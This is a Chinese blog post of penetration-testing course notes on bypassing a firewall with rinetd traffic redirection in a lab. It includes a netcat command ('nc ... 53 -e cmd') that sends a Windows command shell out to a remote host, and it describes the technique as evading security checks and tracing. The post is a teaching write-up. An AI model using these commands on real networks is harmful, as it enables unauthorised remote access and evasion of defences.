Kali Linux渗透测试 114 流量重定向

最新推荐文章于 2023-08-15 07:57:35 发布
最新推荐文章于 2023-08-15 07:57:35 发布
阅读量1.5k 收藏
点赞数
分类专栏: kali-linux 文章标签: kali-linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kevinhanser/article/details/79838162
版权

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 流量操控技术

1. 简介

  1. 简介

    • Traffic manipulation technique
    • 渗透测试中经常遇到访问受限的网络环境
    • 使用隐蔽的手段逃避安全检查措施和溯源追踪
    • 证明看似严格的访问控制仍然存在弱点
    • 在非受信任的网络中实现安全的数据传输
    • 部分概念的实现过程略有烧脑

  2. 重定向 (Redirection)

    • IP、Port

  3. 隧道 (Tunneling)

    • 在不受信任的网络环境中实现安全的通信
    • 通常使用多种加密技术建立通信隧道
    • 点到点(IP2IP)、端到端(Port2Port,更安全)隧道
    • VPN:pptp、l2tp、IPSec、SSL vpn

  4. 封装 (encapsulation)

    • 通常结合在隧道中使用,使用一种协议封装一种协议 (RPC over http、VoIP)
    • 使用网关设备实现不同类型的互联互通

2. 重定向

  1. 安装 Rinetd

    • 安装:apt-get install rinetd

    • 配置:/etc/rinetd.conf

       bindadd bindport connectadd connectport
    • 运行 Rinetd

  2. 应用场景

    • 重定向 web 流量,突破上网限制

      • 当公司防火墙只允许53端口访问外网的情况

    • 远程桌面重定向

    • NC 重定向获得 shell
    • 不兼容 ftp 等第二次连接的协议

  3. 远程桌面重定向环境进行测试

    • 环境拓扑

      防火墙限制 winxp 访问外网,仅允许53 端口的流量访问内外网
在外网家庭主机 kali 上设置 rinetd 来进行代理
winxp 通过 53 端口访问 kali(rinetd) 进行流量转发,将53端口的流量转发为 80 端口的流量

m0n0wall <--bridge--> kali <--bridge--> 外网服务器win2003(http、rdp、nc)

m0n0wall <--hostonly--> 家庭 winxp
m0n0wall <--bridge--> 外网服务器 win2003(http、rdp、nc)
配置 m0n0wall 禁止 winxp 访问外网,只开放53端口

    • 安装 m0n0wall 防火墙

      仅主机
指定 ip: LAN: 1.1.1.1

    • winxp 

      仅主机
ip:1.1.1.10(dhcp自动获取)



    • win2003 开启 rdp,IIS

      桥接
ip:192.168.1.12(dhcp自动获取)

    • Kali 安装 rinetd

      桥接
ip:192.168.1.11(dhcp自动获取)
root@kali:~# apt-get install rinetd
root@kali:~# cat /etc/rinetd.conf


      root@kali:~# rinetd

    • winxp 访问外网


  4. NC 重定向获得 shell 环境测试

    将 kali 中的 nc.exe 复制到 winxp 和 win2003

    • win2003

      C:\>nc -nvlp 333

    • kali

      root@kali:~# vim /etc/rinetd.conf


      重启 rinetd

    • winxp

      C:\>nc 192.168.1.11 53 -e cmd

  5. 缺点:明文传输,未加密

网络安全打工人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali Linux渗透测试技术详解
02-19
Kali Linux渗透测试技术详解本书由浅入深地介绍了Kali Linux的各种渗透测试技术。书中选取了最核心和最基础的内容进行讲解,让读者能够掌握渗透测试的流程,而不会被高难度的内容所淹没。本书涉及面广,从基本的知识...
KaliLinux渗透测试五步曲
03-23
TechTarget中国原创】KaliLinux的设计目的是渗透测试。不管渗透测试者的起点是白盒测试、黑盒测试,还是灰盒测试,在用Kali或其它工具进行渗透测试时,总要遵循一些步骤。  KaliLinux的设计目的是渗透测试。不管...
使用kali进行局域网icmp重定向攻击
qq_42039946的博客
01-25 2858
1.环境准备 攻击机:kali虚拟机 IP地址192.168.126.130 网关192.168.126.2 安装好netwox工具 靶机:win7虚拟机 IP地址192.168.126.131 网关192.168.126.2 目的:通过KALI给win7发送ICMP重定向报文使win7认为原192.168.126.2的网关失效,数据包通过192.168.126.130来转发 2.流程操作 攻击前win7可以正常访问公网 在kali上执行攻击命令 sudo netwox 86 -..
Rinetd重定向突破内网限制
q664609859的博客
12-26 1144
背景:通过Rinetd突破内网限制实行端口转发 实验准备:一台实验机,一台转发机(Kali 系统)1、在kali上安装Rinetd转发机中apt-get install rinetd2、修改重定向配置转发机中vim /etc/rinetd.conf 找到bindaddress bindport connectaddress connectport所在行下面一行 分别写绑定地址 绑定端口 连接
Kali Linux渗透测试 119 隧道工具--SOCAT
kevinhanser
04-08 931
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 被称为 nc++(增强增强版的nc)双向数据流通道工具 连接端口Socat - tcp:1.1.1.1:80 侦听端口(作为服务端)socat - tcp4-listen:22 / socat -
kali linux之Bdfproxy
weixin_30825199的博客
03-05 347
Bdfproxy(mitmproxy) 基于流量劫持动态注入shellcode(arp欺骗,dns欺骗,流氓ap) 步骤: 开启流量转发---------sysctl -w net.ipv4.ip_forward=1 配置iptables策略 iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports...
Kali Linux渗透测试 117 DNS 协议隧道--iodine
kevinhanser
04-08 1226
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 基于 DNS 查询的隧道工具 与同类工具相比的优点对下行数据不进行编码,因此性能优 支持多平台:Linux、BSD、Mac OS、Windows 最大16个并发链接 支持同网段隧道IP(不同于服务
流量复制/流量重定向
点点的博客
10-26 2475
需求:将本地机房的流量引到云机房(在一个地区出现问题,一个业务可能会失去那片地区的所有客户并需要手动将流量重定向到另一个区域,可以采用那些技术实现) 第一:首先想到的是请求转移或者流量劫持 第二:改配置nginx或者F5或者WAF,一部分转移到云机房IP或者域名上 第三:iptables:流量劫持是通过 iptables 转发实现的 第四:graftcp 一个可以把指定程序的 TCP 连接重定向到 SOCKS5 proxy 的工具 第五:使用 Portbender 重定向 TCP 端口流量 第六:frsoc
探秘网络重定向:解析以太网、IP和DNS流量的全方位详解!
m0_72410588的博客
08-15 380
以太网是目前应用最广泛的局域网技术。它通过使用以太网帧来传输数据,具有较高的传输速率和灵活性。首先,我们将介绍以太网的基本原理和帧格式,为后续的流量重定向奠定基础。IP(Internet Protocol)协议是互联网的核心协议之一,负责将数据包从源主机传输到目标主机。在本节中,我们将深入了解IP协议的基本原理和数据包格式,为后续的IP流量重定向提供必要的背景知识。DNS(Domain Name System)是一个将域名解析为IP地址的分布式命名系统。
流量隧道之转发篇(重定向)
weixin_43202965的博客
03-03 2596
·-·重定向 ·应用场景 重定向web流量,突破上网限制 远程桌面重定向 ·安装monowall防火墙(模拟公司防火墙) 场景:公司内部网络不允许访问外网,公司防火墙只允许53端口出站流量。简单拓扑:公司内网机子A,防火墙FW(monowall),外网重定向机子B,外网想访问的目标机子C 拓扑图: 下面的实操案例中A(IP:192.168.10.30),FW(LAN:192.168.10.3,WA...
kali开启流量转发进行流量分析
qq_51836189的博客
10-26 1184
kali开启流量转发后靶机仍然断网的处理方式
ARP渗透与攻防(三)之流量分析
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-23 2884
ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。ARP攻击主要是存在于局域网网络中,局域网中若有一台计算机感染ARP木马,则感染该ARP木马的系统将会试图通过“ARP欺骗”手段截获所在网络内其它计算机的通信信息,并因此造成网内其它计算机的通信故障。
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,...课程主要内容:学习Kali Linux安全测试使用工具的使用,以及高级技巧的使用
Kali Linux渗透测试实战
03-10
Kali Linux渗透测试实战 如果您之前使用过或者了解BackTrack系列Linux的话,那么我只需要简单的说,Kali是BackTrack的升级换代产品, 从Kali开始,BackTrack将成为历史。如果您没接触过BackTrack也没关系,我们从头...
c语言涂格子游戏源码.rar
04-22
c语言涂格子游戏源码.rar
node-v18.14.2-linux-armv7l.tar.xz
最新发布
04-22
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
C++ 实现全连接神经网络及矩阵头文件 及技术指导
04-22
矩阵头文件
node-v14.7.0-darwin-x64.tar.xz
04-22
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
node-v16.6.0-linux-s390x.tar.xz
04-22
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
kali linux渗透测试靶机
02-23
Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值